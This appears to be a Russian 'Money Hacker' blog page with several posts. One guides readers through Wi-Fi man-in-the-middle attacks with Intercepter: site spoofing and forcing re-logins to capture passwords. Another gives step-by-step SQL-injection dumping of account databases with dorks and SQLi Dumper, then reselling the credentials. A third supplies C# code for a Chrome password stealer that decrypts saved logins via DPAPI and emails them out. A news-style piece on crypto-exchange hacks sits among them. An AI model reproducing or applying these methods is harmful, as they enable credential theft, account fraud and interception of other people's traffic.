Как перехватывать трафик внутри Wi-Fi сети

В этой статье рассмотрим бесплатное программное обеспечение для получения удаленного доступа в локальных системах. Цель этой статьи – показать какие последствия могут быть при использовании публичных WiFi сетей.

Intercepter

Intercepter – это многофункциональный сетевой инструмент, который позволяет получить данные из трафика (пароли, сообщения в мессенджерах, переписки и т.д.) и реализовать различные MiTM-атаки.

Основной функционал

  •  Перехват сообщений мессенджеров.
  • Перехват кукис файлов и паролей.
  • Перехват активности (страницы, файлы, данные).
  • Возможность подмены скачивания файлов, добавляя вредоносные файлы. Можно использовать совместно с другими утилитами.
  • Подмена сертификатов Https на Http.

Режимы работы

Messengers Mode – позволяет проверять переписку, которая была отправлена в незашифрованном виде. Применялась для перехвата сообщений в таких мессенджерах ICQ, AIM, JABBER сообщений.

Ressurection Mode – восстановления полезных данных из трафика, из протоколов которые передают трафик в открытом виде. Когда жертва просматривает файлы, страницы, данные, можно частично или полностью их перехватывать. Дополнительно можно указать размер файлов, чтобы не загружать программу маленькими частями. Эту информацию можно использовать для анализа.

Password Mode – режим для работы с куки файлами. Таким образом, можно получить доступы к посещаемым файлам жертвы.

Scan mode – основной режим для тестирования. Для начала сканирования необходимо нажать правой кнопкой мыши Smart Scan. После сканирования в окне будут отображаться все участники сети, их операционная система и другие параметры.

Дополнительно в этом режиме можно просканировать порты. Необходимо воспользоваться функцией Scan Ports. Конечно для этого есть и намного функциональные утилиты, но наличие этой функции – важный момент.

Если в сети нас интересует целенаправленная атака, то после сканирования необходимо добавить целевой IP в Nat с помощью команды (Add to Nat). В другом окне можно будет провести другие атаки.

Nat Mode. Основной режим, который позволяет проводить ряд атак по ARP. Это основное окно, которое позволяет проводить целенаправленные атаки.

DHCP mode. Это режим, который позволяет поднять свой DHCP сервер для реализации атак DHCP по середине.

Некоторые виды атак, которые можно проводить

Подмена сайта

Для подмена сайта у жертвы необходимо перейти в Target, после этого необходимо указать сайт и его подмену. Таким образом можно подменить достаточно много сайтов. Все зависит от того, насколько качественный будет фейк.

В результате жертва открывает фейковый сайт при запросе vk.com. И в режиме паролей должен быть логин и пароль жертвы:

Расшифровка трафика

Чтобы провести целенаправленную атаку необходимо выбрать жертву из списку и добавить ее в таргет. Это можно сделать с помощью правой кнопкой мыши.

Теперь можно в режиме Ressurection Mode восстановить разные данные из трафика.

Подмена трафика

Далее необходимо указать в настройках несколько параметров:

После этого у жертвы будет меняться запрос "trust" на "loser".

Дополнительно можно убить кукис-файлы, чтобы жертва вышла со всех аккаунтов и повторно авторизовалась. Это позволит перехватить логины и пароли.

Как увидеть потенциального сниферра в сети с помощью Intercepter?

С помощью опции Promisc Detection можно обнаружить устройство, которое ведет сканирование в локальной сети. После сканирование в графе status будет «Sniffer». Это первый способ, которые позволяет определить сканирование в локальной сети.

Устройство SDR HackRF

SDR - это своеобразный радиоприемник, который позволяет работать с разными радиочастотными параметрами. Таким образом, можно перехватывать сигнал Wi-Fi, GSM, LTE и т.д.

HackRF - это полноценное SDR-устройство за 300 долларов. Автор проекта Майкл Оссман разрабатывает успешные устройства в этом направлении. Ранее был разработан и успешно реализован Bluetooth-снифер Ubertooth. HackRF успешный проект, который собрал более 600 тысяч на Kickstarter. Уже было реализовано 500 таких устройств для бета-тестирования.

HackRF работает в диапазоне частот от 30 МГц до 6 ГГц. Частота дискретизации составляет 20 МГц, что позволяет перехватывать сигналы Wi-FI и LTE сетей.

Как обезопасить себя на локальном уровне?

Для начала воспользуемся софтом SoftPerfect WiFi Guard. Есть портативная версия, которая занимает не более 4 мб. Она позволяет сканировать вашу сеть и отображать, какие устройства в ней отображены. В ней есть настройки, которые позволяют выбрать сетевую карту и максимальное количество сканируемых устройств. Дополнительно можно выставить интервал сканирования.

После сканирования программа присылает уведомления, сколько есть неизвестный устройств. Это позволяет нам добавлять и отмечать доверенных пользователей и заметить, если кто-то подключился и начинает прослушивать трафик. Уведомления будут приходить после каждого интервала сканирования. Это позволяет отключить определенного мошенника на уроне роутера, если есть подозрительные действия.  

Заключение

Таким образом, мы рассмотрели на практике, как использовать программное обеспечение для перехвата данных внутри сети. Рассмотрели несколько конкретных атак, которые позволяют получить данные для входа, а также другую информацию. Дополнительно рассмотрели SoftPerfect WiFi Guard, которые позволяет на примитивном уровне защитить локальную сеть от прослушивания трафика.



*****************************************************

Money Hacker - ПОДПИШИСЬ!

November 4, 2018
1
259

Как взламывают криптовалютные биржи

Прогремевший в конце января 2018 года взлом японской криптовалютной биржи Coicheck не только лишил пользователей токенов на сумму, эквивалентную более $500 млн, но и здорово пошатнул уверенность криптосообщества в степени киберзащиты подобных центров обмена.

В результате 5 марта японцы объединились против внешнего врага — организация, в которую войдут 16 лицензированных бирж, будет не только заниматься саморегулированием, но и противостоять атакам хакеров. Растущая популярность всего, обладающего приставкой «блокчейн» и пахнущего быстрыми деньгами, неизбежным образом привлекает к этой сфере мошенников.

Пока криптобиржи, разработчики и держатели электронных кошельков пренебрегают безопасностью, растет число сообщений об «ограблениях века» и многомиллионных хищениях с криптовалютных площадок. Чем промышляют криптобандиты, каков их набор средств и — самое главное! — что делать, чтобы не стать жертвой.

Как мухи на варенье

Согласно отчету Group-IB, одного из лидеров рынка по кибербезопасности, блокчейн-проекты остаются лакомым куском для тех, кто промышляет разного рода атаками и хищениями. В среднем один ICO проект подвергается атакам как минимум 100 раз. Международные криптовалютные площадки, где оборот средств в разы выше, становятся мишенями злоумышленников ничуть не реже. Только цифры и убытки, как правило, гораздо внушительнее.

Южнокорейская криптовалютная биржа Youbit подвергалась хакерским взломам в апреле и декабре 2017 года. Первый взлом привел к потере около 4000 биткоинов, второй лишил биржу 17% всех активов и привел к закрытию. NiceHash, площадка для покупки, продажи и аренды майнингового оборудования, была взломана в начале декабря 2017 года, общая сумма ущерба — $80 млн.

Популярную японскую криптобиржу Coincheck в конце января 2018 года навестили злоумышленники, которым удалось перевести на свои электронные кошельки 523 млн токенов криптовалюты NEM, стоивших на тот момент, примерно $534 млн. А были еще кейсы с биржами Bithumb, Mt. Gox — cписок можно продолжать, как говорят американцы, you name it.

«Количество атак на криптовалютные биржи резко возросло как раз в тот момент, когда сами цифровые валюты начали расти в цене. В декабре 2017 года стоимость Bitcoin достигла $20 000, что не могло не привлечь внимание киберпреступников, — отмечает генеральный директор компании SEC Consult Services Георгий Лагода. — При этом уровень защиты этих площадок против кибератак оказался недостаточно высоким, чтобы предотвратить миллионные потери».

Ловись, биржа, большая и маленькая

В чем уязвимость блокчейна при кибератаке? Во-первых, разработчики неверным образом зачастую полагают, что слова «крипто» и «блокчейн» означают безопасность по умолчанию.

«Должное внимание не уделяется ни качеству кода, ни сетевой архитектуре, — замечает Георгий Лагода, — а ведь они могут быть уязвимы. Отдельного внимания заслуживает безопасность смарт-контрактов. И здесь зачастую полагаются на безопасность структуры блокчейна, упуская из виду небезопасное использование генераторов псевдослучайных чисел, используя данные из основной сети Bitcoin или аналогичных валют в качестве источника случайной величины».

В феврале специалисты подсчитали, что из миллиона смарт-контрактов Ethereum уязвимостями обладают более 34 000. Исследователи из Университетского Колледжа Лондона проверили свои предположения на 3000 смарт-контрактах блокчейна Ethereum. 89% из них оказались носителями тех или иных багов, что теоретически позволило бы украсть эфиров на сумму $6 млн.

Самыми популярными атаками на сегодняшний день являются атаки типа DDoS и фишинг.

В целом, аббревиатура DDoS (Distributed Denial of Service — распределенный отказ в обслуживании) уже давно украшает сводки новостей и вызывает трепет пользователей. При такой атаке хакеры направляют на сервер искусственно созданный трафик, имеющий несколько источников, чтобы создать для сервера непосильную нагрузку, и «кладут» его.

В этом случае биржи также теряют деньги, ведь при отсутствии доступа, особенно длительного, пользователи биржи не могут использовать ее функции, и капитал не движется. Криптовалютная биржа Bitfinex в декабре 2017 года подверглась мощнейшей атаке такого рода.

Фишинг (phishing) — мошенничество, основанное на принципах социальной инженерии. Сначала создается практически точная копия сайта, например, выбранной злоумышленниками биржи. Затем при помощи спам-технологий рассылается письмо, составленное таким образом, чтобы быть максимально похожим на настоящее письмо от биржи.

Почти в точности повторяются логотипы, имена и фамилии реальных руководителей. Сообщается о том, что из-за смены программного обеспечения или — вот ирония! — из-за нападения хакеров пользователю необходимо подтвердить или изменить свои учетные данные. Во всех случаях цель таких писем одна — заставить пользователя нажать на приведенную ссылку, а затем ввести свои конфиденциальные данные на ложном сайте.

Пользователи популярной криптовалютной биржи Binance несколько недель назад стали жертвами таких трюкачей, причем отличить настоящий сайт от фейка невооруженным глазом было почти невозможно.

Поэтому красной линией любых списков рекомендаций от экспертов всегда проходит заклинание: не хранить значительные средства на биржах и использовать эти площадки только для сделок.

«Атаки на ICO — те вообще происходят постоянно, — утверждает Евгений Юртаев, директор финтех-компании Zerion, производителя программного обеспечения. — Один из самых частых примеров — спуфинг, когда злоумышленники получают доступ к DNS сайта и перенаправляют его на несуществующий домен. От такой атаки пострадала, например, Enigma, когда на поддельном сайте выставили адрес, куда надо было отправлять эфиры, и было украдено больше $500 000. Общей рекомендацией остается не хранить крупные суммы денег на централизованных биржах и по возможности использовать децентрализованные альтернативы, которые набирают ликвидность».

Щит, меч и регистрация

Что делать? Существует способ приблизить размер рисков к нулю: проведение внутренних и внешних аудитов информационной безопасности, постоянный мониторинг активности пользователей и использование рекомендованных экспертами решений. Существует, например, чаще других используемый аудиторами международный стандарт CobiT (Control Objectives for Information and related Technology).

Одна из основ блокчейна — использование смарт-контракта. Его всесторонний аудит также нужно проводить в обязательном порядке. Отличие от «обычной» защиты информации в критичности системы и объеме денег, который постоянно крутится в проекте, а также в своей логике работы системы.

Чтобы защитить своих пользователей, бирже нужно прежде всего защитить себя. Самым распрост��аненным решением является использование двухфакторной аутентификации (2FA) и «холодных» серверов.

Некоторые биржи идут дальше и просят пользователей предоставить копии документов. Например, на Bittrex тре­бу­ет­ся ве­ри­фи­ка­ция ак­ка­ун­та с ука­за­ни­ем пер­со­наль­ных дан­ных для вы­во­да циф­ро­вой ва­лю­ты общим объ­е­мом до 3 биткоинов в день.

При вы­во­де до 100 бит­ко­и­нов в день — с предо­став­ле­ни­ем копии удо­сто­ве­ре­ния лич­но­сти. Кроме того, ос­нов­ная часть всех циф­ро­вых ак­ти­вов биржи хра­нит­ся офлайн на «хо­лод­ных», то есть фи­зи­че­ски не под­клю­чен­ных ни к ка­ко­му ком­пью­те­ру, но­си­те­лям и вы­во­дит­ся он­лайн толь­ко при со­вер­ше­нии тран­зак­ций.

Также существуют процедуры AML (Anti Money Laundering — борьба с отмыванием денег) и КУС (Know Your Client — знай своего клиента), которые биржи объявляют обязательными.

Ключ от квартиры, где деньги лежат

Говорят, что существует три вида лжи: ложь во благо, отъявленная ложь и статистика. Так вот, статистика говорит, что на 1000 строк исходного кода в среднем насчитывается 1 ошибка. И нет никакой уверенности, что именно этот баг не будет связан с безопасностью.

Как утверждают эксперты по кибербезопасности, даже если разработчики биржи напишут идеальный код, всегда остается риск, что в сторонних проектах, которые им приходится использовать, будут уязвимости.

«Поскольку любая биржа, и не только криптовалютная, это «про деньги», отдельное место в общем спектре атак играют атаки, основанные на социальной инженерии. А также, как ни удивительно, случайные события, причиной которых служат обычная человеческая глупость и невнимательность. Рядовые пользователи — часто большие любители слабых паролей, потерянных «холодных» кошельков, использования «горячих» кошельков и публичного Wi-Fi для доступа к большому объему средств, перехода по подозрительным ссылкам», — описывает распространенные ошибки Георгий Лагода.

В конечном итоге пользователь или площадка, у которых украли средства тем или иным способом, вынуждены рассчитывать лишь на честность хакеров, так как в отличие от традиционной финансовой среды алгоритмы возмещения утраченных средств в криптосфере не отработаны. Если хакеры взломают ваш банковский счет и уведут с него значительную сумму денег, то банк может отследить и аннулировать криминальные транзакции, возместив ущерб.

Компенсация украденной криптовалюты проблематична или просто невозможна по технологическим причинам и в силу анонимности транзакций. Тем более любопытно выглядит история неизвестного Робина Гуда хакерского происхождения, который по неизвестной причине вернул $26 млн в токенах Ethereum в лоно ограбленной им в прошлом году биржи CoinDash. Рассчитывать на подобный альтруизм в большинстве случаев не приходится.

Поэтому стоит помнить:

  • во-первых, и у хайпа есть цена;
  • во-вторых, безопасность, как всегда, превыше всего.


*****************************************************

Money Hacker - ПОДПИШИСЬ!

October 27, 2018
0
215

Добыча аккаунтов. Заработок на дампе.

Статья написана для новичков.

"Как дампить?" или "Где брать аккаунты?". Так вот сегодня мы и будем добывать аккаунты и получать с них профит.

Что нам потребуется:

  1. Мозги и ровные руки.
  2. Дорки.
  3. Прокси желательно приватные, но можно и паблик.
  4. Для лучшего результата приват софт.

Я не буду описывать создание дорок, есть достаточно статей и способов для этого.

Итак приступим:

  • Открываем Searcher нажимаем "Sourse" и выбираем наши дорки.
  • Нажимаем "Proxy" и загружаем прокси.
  • Настраиваем прокси как на картинке:
  • Жмем "Start" и ждем конца парсинга (ну или пока не надоест).
  • Открываем SQLi Dumper и импортируем наши ссылки:
  • Переходим в следующую вкладку и жмем "Start Exploiter" ждем окончания проверки.
  • Во вкладке "Injectables" выставляем галочки как на скриншоте и жмем "Start Analyzer":
  • После того как дождались конца выделяем все ссылки и жмем Search Columns\ Tables Names, пишем то что будем искать к примеру:
  • Жмем "Start", ищем одинаковое число в скобках:
  • Выбираем одну из них и жмем "Go To Dumper", "Dumper form".
  • Выбираем нужную колонку в нашем случае user и жмем "Get Columns".

Ставим галочки на колонках которые нам нужны и жмем "Get Data" после слития базы экспортируем в документ.

И так мы слили базу но чаще всего она в зашифрованном виде, чтобы что то получить с неё её нужно расшифровать.

По расшифровке написано довольно много статей гуглите.

Допустим мы получили email:password, что делать дальше? Желательно прогнать базу антипабликом и сохранить приват. Дальше есть много способов получения профита с этого:

  1. Найти скупщиков баз.
  2. Набираете у людей запросы которые им нужны и чекаете на валид, в случае успеха продаем запросы.
  3. Чекаем на невалид запросы (origin, uplay и т. д.) и продаем аккаунты скупщикам или знакомым.

С первым пунктом все понятно.

Второй пункт тоже набираете прокси, берете кряк AIO или Amfi и идете чекать(забугор не обязательно чекать с прокси но лучше с ними).

*********************************************************

Money Hacker - ПОДПИШИСЬ!

September 7, 2018
0
436

Воруем пароли из Google Chrome

Задача: Написать свой стиллер, который будет расшифровывать пароли GoogleChrome и отсылать на почту. 

Для начала поговорим о DPAPI(Data Protection Application Programming Interface) – Майкрософт, как и многие компании столкнулась с проблемой шифрования данных, которые могут быть расшифрованы только на стороне клиента. В итоге был создан алгоритм на основе мастер – ключа. 


Мастер – ключ - это комбинация следующих элементов: 

SID — уникальный идентификатор безопасности. 

HMAC (сокращение от англ. hash-based message authentication code, хеш-код идентификации сообщений). 

PBKDF2 – Password-Based Key Derivation Function. Стандарт формирования ключа на основе пароля. Использует псевдослучайную функцию для получения ключей. 

MasterKey BLOB — это как раз данные с зашифрованным ключом. 

Подробнее почитать тут https://habrahabr.ru/post/148602/ 


Отсюда следует главный вывод, что расшифровать пароли хрома можно только там где они были созданы. 

Давайте напишем такой стиллер. 


Установим SQLLITE уже известным нам менеджером установки пакетов и добавим следующий код: 


string fileDb = @"C:/Users/Adminka/AppData/Local/Google/Chrome/User Data/Default/Login Data"; // Путь к логин данным 

string connectionString = $"Data Source = {fileDb}"; 

string fileName = @"C:/Temp/output.txt"; // Выходной файл с паролями 

StreamWriter sw = new StreamWriter(fileName, false, Encoding.UTF8); 

string dbWay = "Login Data"; 

string db_fields = "logins"; // база паролей SQLITE 

byte[] entropy = null; 

string description; 


DataTable db = new DataTable(); 

string sql = $"SELECT * FROM {db_fields}"; 

using (SQLiteConnection connection = new SQLiteConnection(connectionString)) 

SQLiteCommand command = new SQLiteCommand(sql, connection); 

SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); 

adapter.Fill(db); 


int rows = db.Rows.Count; 

Console.WriteLine($"Всего записей: {rows}"); 


for (int i = 0; i < rows; i++) 

string url = db.Rows[1].ToString(); 

string login = db.Rows[3].ToString(); 

byte[] byteArray = (byte[])db.Rows[5]; 

byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); 

string password = new UTF8Encoding(true).GetString(decrypted); 

sw.WriteLine("----------------------------"); 

sw.WriteLine($"Номер: {i}"); 

sw.WriteLine($"Сайт: {url}"); 

sw.WriteLine($"Логин: {login}"); 

sw.WriteLine($"Пароль: {password}"); 

sw.Close(); 


MailSend.SendMail("smtp.mail.ru", "YourEmail@mail.ru", "password", "YandexMail3@ya.ru", "Пароли", fileName, fileName); 

Console.ReadKey(); 


Код класса DPAPI Взят отсюда http://www.obviex.com/samples/dpapi.aspx


*********************************************************

Money Hacker - ПОДПИШИСЬ!

September 5, 2018
1
549
Show more